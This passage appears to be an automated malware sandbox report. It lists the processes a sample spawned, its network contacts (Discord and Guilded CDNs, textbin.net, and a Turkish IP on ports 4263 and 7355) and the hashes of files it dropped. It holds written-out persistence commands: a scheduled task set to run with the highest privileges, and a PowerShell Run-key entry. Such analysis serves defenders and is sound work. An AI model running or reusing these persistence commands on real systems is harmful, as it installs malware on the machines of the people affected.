schtasks /create /tn \OperaCert /tr "C:\Users\Admin\AppData\Roaming\OperaCert\OperaCert.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Remove-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'VisualStudioCert';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'VisualStudioCert' -Value '"C:\Users\Admin\AppData\Roaming\VisualStudioCert\VisualStudioCert.exe"' -PropertyType 'String'
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.VCLibs.140.00_8wekyb3d8bbwe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k UnistackSvcGroup
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 158.240.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | img.guildedcdn.com | udp |
| NL | 13.227.219.55:443 | img.guildedcdn.com | tcp |
| US | 8.8.8.8:53 | 4.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.219.227.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.113.22.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| NL | 13.227.219.55:443 | img.guildedcdn.com | tcp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| NL | 13.227.219.55:443 | img.guildedcdn.com | tcp |
| US | 8.8.8.8:53 | 39.142.81.104.in-addr.arpa | udp |
| NL | 13.227.219.55:443 | img.guildedcdn.com | tcp |
| NL | 13.227.219.55:443 | img.guildedcdn.com | tcp |
| NL | 13.227.219.55:443 | img.guildedcdn.com | tcp |
| US | 8.8.8.8:53 | 2.136.104.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| NL | 13.227.219.55:443 | img.guildedcdn.com | tcp |
| US | 8.8.8.8:53 | 135.1.85.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 119.110.54.20.in-addr.arpa | udp |
| NL | 13.227.219.55:443 | img.guildedcdn.com | tcp |
| US | 8.8.8.8:53 | 25.14.97.104.in-addr.arpa | udp |
| NL | 13.227.219.55:443 | img.guildedcdn.com | tcp |
| US | 8.8.8.8:53 | 1.202.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | textbin.net | udp |
| US | 148.72.177.212:443 | textbin.net | tcp |
| US | 8.8.8.8:53 | 212.177.72.148.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | 233.129.159.162.in-addr.arpa | udp |
| US | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| TR | 46.1.103.69:4263 | tcp | |
| US | 8.8.8.8:53 | 69.103.1.46.in-addr.arpa | udp |
| US | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | 17.14.97.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.208.79.178.in-addr.arpa | udp |
| US | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| TR | 46.1.103.69:7355 | tcp | |
| TR | 46.1.103.69:4263 | tcp | |
| TR | 46.1.103.69:7355 | tcp | |
| US | 8.8.8.8:53 | 13.173.189.20.in-addr.arpa | udp |
Files
memory/4448-0-0x00000000006E0000-0x00000000006F6000-memory.dmp
memory/4448-1-0x0000000074EE0000-0x0000000075690000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\00b65495-88ce-45af-bf00-3dc3c78edb4f.bat
| MD5 | d0cec99ca3a717c587689ebf399662c4 |
| SHA1 | 1d4bbaf8079912ada46a6fa8693d8c20d5ec5b66 |
| SHA256 | b1ae110ef84ecec90a75742ca29adc0704b67abe8f093aa5a959ea0864766228 |
| SHA512 | 99b21193db6615a33eb738c246229e9a7efcaf03fcab24654d67680396155a0c62cbc834078687d75d1892b1708383eafeda4f87e86b33bd827b18bc988122f7 |
memory/1148-5-0x0000000074EE0000-0x0000000075690000-memory.dmp
memory/1148-4-0x0000000002760000-0x0000000002796000-memory.dmp
memory/1148-6-0x00000000027D0000-0x00000000027E0000-memory.dmp
memory/1148-7-0x0000000004F20000-0x0000000005548000-memory.dmp
memory/1148-8-0x0000000004E70000-0x0000000004E92000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_atkaxood.1fr.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1148-9-0x0000000005640000-0x00000000056A6000-memory.dmp
memory/1148-19-0x00000000057F0000-0x0000000005856000-memory.dmp
memory/1148-20-0x00000000058A0000-0x0000000005BF4000-memory.dmp
memory/1148-21-0x0000000005D20000-0x0000000005D3E000-memory.dmp
memory/1148-22-0x0000000005F80000-0x0000000005FCC000-memory.dmp
memory/1148-23-0x00000000027D0000-0x00000000027E0000-memory.dmp
memory/1148-24-0x0000000007350000-0x00000000079CA000-memory.dmp
memory/1148-25-0x0000000006240000-0x000000000625A000-memory.dmp
memory/1148-29-0x0000000074EE0000-0x0000000075690000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 4280e36a29fa31c01e4d8b2ba726a0d8 |
| SHA1 | c485c2c9ce0a99747b18d899b71dfa9a64dabe32 |
| SHA256 | e2486a1bdcba80dad6dd6210d7374bd70ae196a523c06ceda71370fd3ea78359 |
| SHA512 | 494fe5f0ade03669e5830bed93c964d69b86629440148d7b0881cf53203fd89443ebff9b4d1ee9d96244f62af6edede622d9eacba37f80f389a0d522e4ad4ea4 |
memory/3160-31-0x0000000074EE0000-0x0000000075690000-memory.dmp
memory/3160-32-0x0000000004F40000-0x0000000004F50000-memory.dmp
memory/3160-33-0x0000000004F40000-0x0000000004F50000-memory.dmp
memory/3160-43-0x0000000005D80000-0x00000000060D4000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 6b86dab0b4639a6c4a2e22a9404f41c6 |
| SHA1 | d8a2dd2094749501265b86292111d262c3dd26e0 |
| SHA256 | 2266c59704d7f547cac6c1213187aded24ec6f7cc6cd1899893a9ae9e79d2c05 |
| SHA512 | e2efee19fe2fa083548b0d05ebae58328e65312cb515487e18227bb1190a744dc9c0633f1eac24e6d263845b67369076ee52e6d905ea92ceb21431753a8e0a06 |
memory/3160-45-0x0000000004F40000-0x0000000004F50000-memory.dmp
memory/3160-48-0x0000000074EE0000-0x0000000075690000-memory.dmp
memory/5084-49-0x0000000074EE0000-0x0000000075690000-memory.dmp
memory/5084-50-0x0000000002870000-0x0000000002880000-memory.dmp
memory/5084-51-0x0000000002870000-0x0000000002880000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 057c44036d34160c061fa81a002d5e32 |
| SHA1 | d9e8a14611d71b30061eccdaba1788669fb5bbc6 |
| SHA256 | a273fa282eba071f61be75b77f636d968594004c1fc75bfd52ac227a4d52a46e |
| SHA512 | ceab98de958cb892eff8ccb7750cc19a991c85de3c89d098fedbcd5accd2f7033a8a5c84e7ed3e3e26015d25e2d76548f5d84c4d133e85e394901337a46be317 |
memory/5084-62-0x0000000002870000-0x0000000002880000-memory.dmp
memory/5084-65-0x0000000074EE0000-0x0000000075690000-memory.dmp
memory/4448-66-0x0000000074EE0000-0x0000000075690000-memory.dmp
memory/4740-67-0x0000000074EE0000-0x0000000075690000-memory.dmp
memory/4740-68-0x0000000002BA0000-0x0000000002BB0000-memory.dmp
memory/4740-69-0x0000000002BA0000-0x0000000002BB0000-memory.dmp
memory/4740-79-0x0000000005B70000-0x0000000005EC4000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | f62b19723225d819cd88fd4eb6a2ad23 |
| SHA1 | 8b6fb909001e01e8b3705fae6ce42f09fbf90444 |
| SHA256 | 8a27f492edf8388023fe0b1e30b7c2dd2728a02e70dd530fe6257303fe264b29 |
| SHA512 | 6dbede708ba2719d1bd10adc2052bf53aa88de24a41488e8d1dacaa65c41d8671224829e398bbdd163133145ec0c037a02a33a77361056d4f9429d126b29d703 |
memory/4740-81-0x0000000002BA0000-0x0000000002BB0000-memory.dmp
memory/4740-84-0x0000000074EE0000-0x0000000075690000-memory.dmp
memory/4456-85-0x0000000074EE0000-0x0000000075690000-memory.dmp
memory/4456-86-0x0000000004910000-0x0000000004920000-memory.dmp
memory/4456-87-0x0000000004910000-0x0000000004920000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 078837c4ad82944571dd2fb4de609def |
| SHA1 | 3ee63b8c74fa1feae4bbb50b274251a534582c12 |
| SHA256 | 5f252aa586a1e08efc905f7d4b144724854ee2794b05489c4d8f41e28e4cab55 |
| SHA512 | bbb3ff6e23490de3cb620b4dadee5ed80106d7bd5f146b2ef10a900dee1e38b5fecd3e4add0ee149551ca0d036421af64891945ec5179466395edd5441acd7c0 |
memory/4456-100-0x0000000074EE0000-0x0000000075690000-memory.dmp
memory/5104-101-0x0000000074EE0000-0x0000000075690000-memory.dmp
memory/5104-102-0x0000000003220000-0x0000000003230000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | bb7d76a883009ce8cc0221fded7cfd1d |
| SHA1 | 58ba94cba93d89804e855d488967bb562a48e186 |
| SHA256 | 7b7c0a5c243d391e610de05a93fa6d9401872daba4b05eaeef9706dadcf7ec8b |
| SHA512 | 4a3c9c8f39c7130766a314bcd6c888c1dbbed832a8347ccd6d7d65ef696e99ba5a1a4ba89f49524edd31cba74810e9e6f6915c4c63f67ccc6ab89b0d9b8d0aa4 |
memory/5104-113-0x0000000003220000-0x0000000003230000-memory.dmp
memory/5104-116-0x0000000074EE0000-0x0000000075690000-memory.dmp
memory/2980-117-0x0000000074EE0000-0x0000000075690000-memory.dmp
memory/2980-118-0x0000000005440000-0x0000000005450000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 99d20a2441228126a68775b53ec0b0f3 |
| SHA1 | 9c6347230648b26ae38d36ecf0bfb7d6b404e6ae |
| SHA256 | 6e80859e9ecac811cfbbc8876afaeb83935a4a346dfd6388f44fcc8e65b97802 |
| SHA512 | d98d77de92da93912cfb72e3fe3b10189eba4bce881f340baf2255c46678cd770fa69d92ed3e233df64f47d9021db4a3c37dadf6ca466ad6fbf043c774f49ada |
memory/2980-129-0x0000000005440000-0x0000000005450000-memory.dmp
memory/2980-132-0x0000000074EE0000-0x0000000075690000-memory.dmp
C:\Users\Public\Music\RunNihaiersion.exe
| MD5 | 123bdf05b4b261644ff4579b8bd78806 |
| SHA1 | d6ce6069ba2faed71c5626daf8094a7ac921848b |
| SHA256 | 9736150b75ca7c0c89b7e0530a98c640b3ee8863b0b39a56a1d8ff9b114de631 |
| SHA512 | e734bd6455e83144ee78d9fe393fb85f968e960a5908a22bd1d884478ca79c5cbef6d0ea010d6dd575920e6931ad0be8ea02af5da46668b7287f00e75afd93b5 |
C:\Users\Public\Music\RunNihaiersion.exe
| MD5 | 123bdf05b4b261644ff4579b8bd78806 |
| SHA1 | d6ce6069ba2faed71c5626daf8094a7ac921848b |
| SHA256 | 9736150b75ca7c0c89b7e0530a98c640b3ee8863b0b39a56a1d8ff9b114de631 |
| SHA512 | e734bd6455e83144ee78d9fe393fb85f968e960a5908a22bd1d884478ca79c5cbef6d0ea010d6dd575920e6931ad0be8ea02af5da46668b7287f00e75afd93b5 |
memory/664-136-0x00000000006F0000-0x00000000006F8000-memory.dmp
memory/664-137-0x0000000074EE0000-0x0000000075690000-memory.dmp
C:\Users\Public\Music\bes.bat
| MD5 | 9947ba16f06abcff429e922c49790337 |
| SHA1 | bd24d00f50e0d63892fc641a1438551d577b6e50 |
| SHA256 | 8683fbcb2068bf7759e1b221e2dc660757e96e2a23ac9404a541ba82fb9c4a4f |
| SHA512 | 2a8ace440d7ab8a3ae6f02a84b5f7c81872d09946752ec02ac1a0fc64d9e1cfcb891c935f11394e395c748fb5b0f8a320f71dac25fa0c19a8a87e688af49cd11 |
memory/664-140-0x0000000074EE0000-0x0000000075690000-memory.dmp
C:\Users\Public\Music\israil.exe
| MD5 | b65cd9956dfe1877c72ffe687fc632b4 |
| SHA1 | 86c1bc804f2394bb0b20fa7434257786eb72e5bf |
| SHA256 | 561d189fb1c2b89e27f0e4be57c4b16dbced1d1940712fed04adfc35d34b05a0 |
| SHA512 | fb2f44fa8821c9d5e048b74a17cdf2bd1a545e4c9c2af7a15ad50e53766c44e50d7dd1c805f0e88e7170f8ae43895977b96e6dec766225670a8e035cd421f4fd |
C:\Users\Public\Music\israil.exe
| MD5 | b65cd9956dfe1877c72ffe687fc632b4 |
| SHA1 | 86c1bc804f2394bb0b20fa7434257786eb72e5bf |
| SHA256 | 561d189fb1c2b89e27f0e4be57c4b16dbced1d1940712fed04adfc35d34b05a0 |
| SHA512 | fb2f44fa8821c9d5e048b74a17cdf2bd1a545e4c9c2af7a15ad50e53766c44e50d7dd1c805f0e88e7170f8ae43895977b96e6dec766225670a8e035cd421f4fd |
memory/4504-145-0x0000000074EE0000-0x0000000075690000-memory.dmp
memory/4504-144-0x0000000000B30000-0x0000000000B38000-memory.dmp
C:\Users\Public\Music\installer2.bat
| MD5 | 50b98ed3895545b2b72b28966cfa2b0d |
| SHA1 | bf98a58225c8ce199e48825624e793ee8e0ca3f8 |
| SHA256 | ac019bd8d7937f836b6039c3d0a33c8e75509fb0ab79ee41ec3171f0cb0e1591 |
| SHA512 | af1c1bb692280e89df2a92f6aedbb90d76e3017572723f1bcacd092ecfd07cb1b05ebb9eb4dc322628d0734f96c95cae0e360042162859e55af957009bf0acaa |
memory/4504-148-0x0000000074EE0000-0x0000000075690000-memory.dmp
memory/4472-149-0x0000000074EE0000-0x0000000075690000-memory.dmp
memory/4472-150-0x0000000000CE0000-0x0000000000CF0000-memory.dmp
memory/4472-151-0x0000000000CE0000-0x0000000000CF0000-memory.dmp
memory/4472-161-0x0000000005DD0000-0x0000000006124000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | e4932a29fac55eb658647a86e86cf995 |
| SHA1 | ceb8fb034cda8494f2eace540d1b4c72b9708604 |
| SHA256 | 27c93601c7a659ba659cd2b52024a8eeb21f57dc9239a7359ea8aa554b094d33 |
| SHA512 | 4450c7eced5610d29a4bef144ff73ede5463ed8fdc377fb3333ea5806918b1d08e806262a0b06cb049a03d26e2021400820f55fb41a85b06629230d721938145 |
memory/4472-163-0x0000000000CE0000-0x0000000000CF0000-memory.dmp
memory/4472-164-0x0000000007050000-0x0000000007082000-memory.dmp
memory/4472-165-0x0000000070570000-0x00000000705BC000-memory.dmp
memory/4472-175-0x0000000006590000-0x00000000065AE000-memory.dmp
memory/4472-176-0x0000000007310000-0x00000000073B3000-memory.dmp
memory/4472-177-0x00000000073E0000-0x00000000073EA000-memory.dmp
memory/4472-178-0x0000000007600000-0x0000000007696000-memory.dmp
memory/4472-179-0x0000000005A90000-0x0000000005AA1000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | fcebc8cfacc896553bb0f5daed630d2d |
| SHA1 | 0f3ba3452f1d5761b242d1a4a949c84b2c6c7707 |
| SHA256 | 69959384a3d9466e4d5b7bfc03d75442779a3552f577209214274a0b2561733d |
| SHA512 | e0a3bf1819ab724b17204211ada14b878727b97f202ace51cab338efbc1715fc80d8266b5369b1bbe3d8909e68a3c04854f04a1ee3135b899b7563bcb63f131f |
C:\Users\Public\Music\RunihaiVersion.exe
| MD5 | 05b73b535c4337c16fc3f039c1b30dc1 |
| SHA1 | 8de245727efd7aaa7fa1a3662430e823b68cec0a |
| SHA256 | 6de49dcfa3016a3a99a4cf0d60745bff75d5e34902fd91b20478673184b482de |
| SHA512 | 6bb62389c085bd29c358427abf6fae55343b923ee1382e28e4a456fab5991c28bcbea202867beb90944adc8033a7a149c2f5234e2464f2f36c07dc32fa7b04f6 |
C:\Users\Public\Music\RunihaiVersion.exe
| MD5 | 05b73b535c4337c16fc3f039c1b30dc1 |
| SHA1 | 8de245727efd7aaa7fa1a3662430e823b68cec0a |
| SHA256 | 6de49dcfa3016a3a99a4cf0d60745bff75d5e34902fd91b20478673184b482de |
| SHA512 | 6bb62389c085bd29c358427abf6fae55343b923ee1382e28e4a456fab5991c28bcbea202867beb90944adc8033a7a149c2f5234e2464f2f36c07dc32fa7b04f6 |
C:\Users\Public\Music\es.bat
| MD5 | b00ef4b757bc25a0f41c3d74961ff9a0 |
| SHA1 | cfdaca2c4c8f1fce33275361260b251d8d74173a |
| SHA256 | 417a75bfa635462b42c3509d826180f719593eacbe29778352461c28579ddd76 |
| SHA512 | 259aef5462238ec388e469de0cbec03f057f536931680060835958a3028aef3a534a13e6f7c6ada6cea12cc520df09a1143ec79920bdd39cc0c875639ba2d93a |
C:\Users\Public\Music\israil2.exe
| MD5 | e000e033786867fa9caa5d9d6728384a |
| SHA1 | 4313fddde6aba146cd3c3ddd42f2db36194ded10 |
| SHA256 | 7c12c2663642035392b389dbdc787c42fe669085be401b3108c14fe2e44a6131 |
| SHA512 | 3c091650c454267153b7b88e6093ea89cb799703eebb8d4ed5e8d25591a0a07261db712eec6b46b74b0408d8cea5103e9aabd4975d9d8fac56be6340a54d8e96 |
C:\Users\Public\Music\israil2.exe
| MD5 | e000e033786867fa9caa5d9d6728384a |
| SHA1 | 4313fddde6aba146cd3c3ddd42f2db36194ded10 |
| SHA256 | 7c12c2663642035392b389dbdc787c42fe669085be401b3108c14fe2e44a6131 |
| SHA512 | 3c091650c454267153b7b88e6093ea89cb799703eebb8d4ed5e8d25591a0a07261db712eec6b46b74b0408d8cea5103e9aabd4975d9d8fac56be6340a54d8e96 |
C:\Users\Public\Music\uuac.bat
| MD5 | c0c5cf18ed5b12d0cf2e77312e553328 |
| SHA1 | 9f594d79de6cd8d546a6b2869029ebbd59c4b93f |
| SHA256 | 197ad34574917cff1d33ae3789fecb0120797e99e652c9746704846ef4a1cc69 |
| SHA512 | 508d0692ab6e648b0d6de9c29c2b4bd85edcf1e3046533f83cdb1d4f98be6b830ea3f185ef81037afd19d13156a3d528c15339608337b62842d32af24b11ca78 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\israil2.exe.log
| MD5 | 916851e072fbabc4796d8916c5131092 |
| SHA1 | d48a602229a690c512d5fdaf4c8d77547a88e7a2 |
| SHA256 | 7e750c904c43d27c89e55af809a679a96c0bb63fc511006ffbceffc2c7f6fb7d |
| SHA512 | 07ce4c881d6c411cac0b62364377e77950797c486804fb10d00555458716e3c47b1efc0d1f37e4cc3b7e6565bb402ca01c7ea8c963f9f9ace941a6e3883d2521 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 3c2fc355b0e808426c6aa6a5f1aa960b |
| SHA1 | faa1122657c30526cdb2bab2f9d33f428b6ee9c3 |
| SHA256 | 06694a3da624aabd587b612efed19285b0aa15c648daee39ef4d3b2a2670ac82 |
| SHA512 | 6425cef80e85725e89d9871f3025d3d9db93dea6450ac08ed70cf39441d6021e97ecc8c88ff12c86a73315721a7e74c2e6c6210224650cbbd822018c0cbaad6c |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | c281910c8dfdfaa149903adcccc4a130 |
| SHA1 | 447703e64f95c0f0184befb7e0979b72b68cb8a0 |
| SHA256 | 9bbedef9203d54c5f848656f1f30bc3be3ea311b0225ead247d47bd69b851d46 |
| SHA512 | f8ae5f604a07c186f5590e79c7069a9f81459c2c23af0fca0c9495e6a9a27d590d6d89033ce59734a3897d8d7bfabf27da7b62262ac29a74683f7e13e9d5798b |
C:\Users\Admin\AppData\Local\Temp\xx.exe
| MD5 | d3e4bf5f503e63ca9f51a3c19c842b0d |
| SHA1 | 7f6fd78fbec8b65744a0cb8ad8e992ed383f0df4 |
| SHA256 | 5372854f4e74839bd6fbb780f40180921bbbb648d863534c36b029a44c90b549 |
| SHA512 | 27c1a8d9959a27d6fbc370dfb677eb9e022417b8a0b8adc103713269a961d6c8eb8782299b745d53ba0b7c4291bf53b3951d5959831df328f2a59effc3fac10f |
C:\Users\Admin\AppData\Local\Temp\xx.exe
| MD5 | d3e4bf5f503e63ca9f51a3c19c842b0d |
| SHA1 | 7f6fd78fbec8b65744a0cb8ad8e992ed383f0df4 |
| SHA256 | 5372854f4e74839bd6fbb780f40180921bbbb648d863534c36b029a44c90b549 |
| SHA512 | 27c1a8d9959a27d6fbc370dfb677eb9e022417b8a0b8adc103713269a961d6c8eb8782299b745d53ba0b7c4291bf53b3951d5959831df328f2a59effc3fac10f |
C:\Users\Admin\AppData\Local\Temp\DomrGLks3k.exe
| MD5 | e026996a95122a919a1ee58b66d9d18c |
| SHA1 | ed4db7e91d93155484545bf071026c8333fb4f87 |
| SHA256 | b5a7a0c9af69d911753b0afdc3859f9f7509749520a308ba4e1e5b547e2c4c9c |
| SHA512 | 6cf718e19b3eea23bf56d2720d8972017c9b65f5f102a9e78c4aad89eed64ba2377a56ab28341716120169d750db0855c207c986eb1893c0e4cb7294dae75871 |
C:\Users\Admin\AppData\Local\Temp\DomrGLks3k.exe
| MD5 | e026996a95122a919a1ee58b66d9d18c |
| SHA1 | ed4db7e91d93155484545bf071026c8333fb4f87 |
| SHA256 | b5a7a0c9af69d911753b0afdc3859f9f7509749520a308ba4e1e5b547e2c4c9c |
| SHA512 | 6cf718e19b3eea23bf56d2720d8972017c9b65f5f102a9e78c4aad89eed64ba2377a56ab28341716120169d750db0855c207c986eb1893c0e4cb7294dae75871 |
C:\Users\Admin\AppData\Local\Temp\Pcg1cjpFnk.exe
| MD5 | 382a46ef7bc798b728ed963d542d61d7 |
| SHA1 | 4af1e5c9d85716555f95d4f88ec5db4d6205b611 |
| SHA256 | f63f83f9ac97bdb155e01b72c8bf38797971ad087d1eb54e6019d10ce901fcc7 |
| SHA512 | 5063fe51a2b048290a7b92f785b1197df981a95b84e3d04610e7dcf5767318f527598fd62c4b89e4da90b7c47ed1c7544b9862bd292123c79f43db9b4dff57f9 |
C:\Users\Admin\AppData\Local\Temp\Pcg1cjpFnk.exe
| MD5 | 382a46ef7bc798b728ed963d542d61d7 |
| SHA1 | 4af1e5c9d85716555f95d4f88ec5db4d6205b611 |
| SHA256 | f63f83f9ac97bdb155e01b72c8bf38797971ad087d1eb54e6019d10ce901fcc7 |
| SHA512 | 5063fe51a2b048290a7b92f785b1197df981a95b84e3d04610e7dcf5767318f527598fd62c4b89e4da90b7c47ed1c7544b9862bd292123c79f43db9b4dff57f9 |
C:\Users\Admin\AppData\Local\Temp\ztMmUa8afO.exe
| MD5 | 2a9c1b05b7c875f6c0f2c43e7abcc381 |
| SHA1 | 623f806907f075368e454ba79f1812007a749c47 |
| SHA256 | 1a16f37765daa60e33fce4570fcc20698d63c058a646956e2e31ddb42f8616e5 |
| SHA512 | 479218de83e5dbbd8e17762dc2cb307e80c0f82d87ea3a9778a8da3936c727529d4238fab8e1ec301a2ce2afb70d3c90e3d3f117cd48fa165254b2feb658a808 |
C:\Users\Admin\AppData\Local\Temp\ztMmUa8afO.exe
| MD5 | 2a9c1b05b7c875f6c0f2c43e7abcc381 |
| SHA1 | 623f806907f075368e454ba79f1812007a749c47 |
| SHA256 | 1a16f37765daa60e33fce4570fcc20698d63c058a646956e2e31ddb42f8616e5 |
| SHA512 | 479218de83e5dbbd8e17762dc2cb307e80c0f82d87ea3a9778a8da3936c727529d4238fab8e1ec301a2ce2afb70d3c90e3d3f117cd48fa165254b2feb658a808 |
C:\Users\Admin\AppData\Local\Temp\aY2woVA23K.exe
| MD5 | 1d19f212f80a82428d6d5aef7b4b784b |
| SHA1 | a58811a2f24fb402058c3987548f4b80fde787f0 |
| SHA256 | 2756eab9d223ada7198458274fb820630d61f4de1c34ab2db9c743bdbc8c4ebd |
| SHA512 | 13673c5cc6c52dc57d5982cf1280ad2f03208586cca40f89f170b55b04b1654069c948a07276d7093ee6899daf41429400c152789ecb1c45265006aa221c8015 |
C:\Users\Admin\AppData\Local\Temp\aY2woVA23K.exe
| MD5 | 1d19f212f80a82428d6d5aef7b4b784b |
| SHA1 | a58811a2f24fb402058c3987548f4b80fde787f0 |
| SHA256 | 2756eab9d223ada7198458274fb820630d61f4de1c34ab2db9c743bdbc8c4ebd |
| SHA512 | 13673c5cc6c52dc57d5982cf1280ad2f03208586cca40f89f170b55b04b1654069c948a07276d7093ee6899daf41429400c152789ecb1c45265006aa221c8015 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | abb339c3479c18eaf406f15c74540f2b |
| SHA1 | 86eda6b43d8f3a6b6a40cb6caa6d7bdbe4c4969f |
| SHA256 | 816948f904472203e1b5a025364e03a2873209aa3f6f2813bd383381b6c3f7f2 |
| SHA512 | 44730573a51c356d4f29ad595c2a8e66c858488f423a8bb5140c44f7ecd465037d09cba8d4fb4339c7dac5cb739d23b62b7e6306694709281485fae841a7c3dd |
C:\Users\Admin\AppData\Local\Temp\iEwFLK0FEN.exe
| MD5 | 4743f7ac802d1cda9c8b55556a4996a5 |
| SHA1 | aeef2809aaed922c4c447d50a9eccae9001abb75 |
| SHA256 | dd9c74f4bd271caf2c8849bb233ccdffb7b7de3c97394aec58714b86286ee749 |
| SHA512 | dbc47c08e4b6ca54e7926fa824989308844e4f116f30e84b46fd7ac88e74e82dc4c079a06193042fcd2466f90054d52d49e1e187a8c6c7d6871fbd2bdc32ed14 |
C:\Users\Admin\AppData\Local\Temp\iEwFLK0FEN.exe
| MD5 | 4743f7ac802d1cda9c8b55556a4996a5 |
| SHA1 | aeef2809aaed922c4c447d50a9eccae9001abb75 |
| SHA256 | dd9c74f4bd271caf2c8849bb233ccdffb7b7de3c97394aec58714b86286ee749 |
| SHA512 | dbc47c08e4b6ca54e7926fa824989308844e4f116f30e84b46fd7ac88e74e82dc4c079a06193042fcd2466f90054d52d49e1e187a8c6c7d6871fbd2bdc32ed14 |
C:\Users\Admin\AppData\Local\Temp\j8AtVjFO2q.exe
| MD5 | 4a6cbc09917c9cd3f0ffa5d702cb82f7 |
| SHA1 | bf4dbc4e763c9de0d99264537f307b602d66fedf |
| SHA256 | e919167dfba17e22e02304ada47074e340ea51bd2ae08378f0cdf99468c0bfa1 |
| SHA512 | 67a8e9eb8312732a57ccbbfc7db17af7ff7703ac7bcdcb72fa71f3ad26cc78edea8f7af475332398e2c44f837480888fde04f8f2004910fd9751e75485fd9266 |
C:\Users\Admin\AppData\Local\Temp\j8AtVjFO2q.exe
| MD5 | 4a6cbc09917c9cd3f0ffa5d702cb82f7 |
| SHA1 | bf4dbc4e763c9de0d99264537f307b602d66fedf |
| SHA256 | e919167dfba17e22e02304ada47074e340ea51bd2ae08378f0cdf99468c0bfa1 |
| SHA512 | 67a8e9eb8312732a57ccbbfc7db17af7ff7703ac7bcdcb72fa71f3ad26cc78edea8f7af475332398e2c44f837480888fde04f8f2004910fd9751e75485fd9266 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\iEwFLK0FEN.exe.log
| MD5 | 28d7fcc2b910da5e67ebb99451a5f598 |
| SHA1 | a5bf77a53eda1208f4f37d09d82da0b9915a6747 |
| SHA256 | 2391511d0a66ed9f84ae54254f51c09e43be01ad685db80da3201ec880abd49c |
